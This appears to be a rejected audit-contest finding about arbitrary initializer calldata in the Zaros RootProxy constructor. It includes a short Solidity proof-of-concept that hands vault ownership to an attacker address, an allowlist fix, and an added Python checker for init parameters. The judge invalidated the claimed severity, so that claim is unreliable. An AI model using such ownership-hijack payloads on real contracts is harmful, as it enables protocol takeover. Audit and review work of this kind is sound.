Part 2

Zaros
Perpetuals DEX Foundry Solidity
70,000 USDC
Submission Details
Severity: high
Invalid

[H-6] Arbitrary Initialization Payloads Allow Deployer Rug-Pull

Summary

The InitParams struct allows the deployer to execute arbitrary code during contract creation, enabling instant protocol destruction.

Vulnerability Details

Affected Code:

constructor(InitParams memory initRootUpgrade) {
    rootUpgrade.upgrade(
        initRootUpgrade.initBranches,
        initRootUpgrade.initializables, // Arbitrary addresses
        initRootUpgrade.initializePayloads // Arbitrary calldata
    );
}

Proof of Concept:

// Malicious Deployer Script
address attacker = 0xBADBAD...;

// One target and one payload; both arrays need an explicit length
address[] memory targets = new address[](1);
targets[0] = address(vault);
bytes[] memory payloads = new bytes[](1);
payloads[0] = abi.encodeWithSignature("transferOwnership(address)", attacker);

RootProxy.InitParams memory params = RootProxy.InitParams({
    initBranches: legitimateBranches,
    initializables: targets,
    initializePayloads: payloads
});
new RootProxy(params); // Ownership transferred to attacker

Exploit Validation:

Deploy with malicious params

Check vault owner: console.log(vault.owner())

Result: 0xBADBAD... (attacker address)

Impact

Immediate Admin Hijacking: Attacker gains protocol control at deployment.

Self-Destruct: Deployer can pass selfdestruct payloads.

Tools Used

Foundry Test: Simulated deployer rug-pull:

Recommendations

// Restrict initializables to known contracts
for (uint256 i = 0; i < initializables.length; i++) {
    require(
        initializables[i] == address(vault) ||
        initializables[i] == address(oracle),
        "Unauthorized initialization"
    );
}

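A complementary off-chain check, as an added example (not code from the submission or from Zaros): it reviews the initializables and initializePayloads arrays of an InitParams value against an allowlist of targets and function selectors before the deployment is signed. The names review_init_params and ALLOWED are hypothetical, and the addresses and approved selectors are constructed placeholders.

```python
# Added example: review RootProxy InitParams before (or after) deployment.
# ALLOWED uses constructed placeholder addresses and selectors, not Zaros values.
ALLOWED = {
    "0x" + "11" * 20: {"aabbccdd"},  # hypothetical vault initializer
    "0x" + "22" * 20: {"11223344"},  # hypothetical oracle initializer
}


def review_init_params(initializables, payloads, allowed=ALLOWED):
    """Return a list of findings; an empty list means the params pass."""
    findings = []
    if len(initializables) != len(payloads):
        findings.append(
            f"length mismatch: {len(initializables)} targets, {len(payloads)} payloads"
        )
    for i, (target, payload) in enumerate(zip(initializables, payloads)):
        selectors = allowed.get(target.lower())
        if selectors is None:
            findings.append(f"[{i}] {target} is not an approved initializable")
            continue
        try:
            data = bytes.fromhex(payload.removeprefix("0x"))
        except ValueError:
            findings.append(f"[{i}] payload is not valid hex")
            continue
        if len(data) < 4:
            findings.append(f"[{i}] payload too short to carry a selector")
        elif data[:4].hex() not in selectors:
            findings.append(f"[{i}] selector 0x{data[:4].hex()} not approved for {target}")
    return findings


if __name__ == "__main__":
    vault = "0x" + "11" * 20
    # Constructed payload shaped like the PoC's: transferOwnership(address)
    # selector (0xf2fde38b) followed by one 32-byte address argument.
    hijack = "0xf2fde38b" + "00" * 12 + "ba" * 20
    for finding in review_init_params([vault], [hijack]):
        print(finding)
```
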
Updates

Lead Judging Commences

inallhonesty Lead Judge 3 months ago
Submission Judgement Published
Invalidated
Reason: Non-acceptable severity
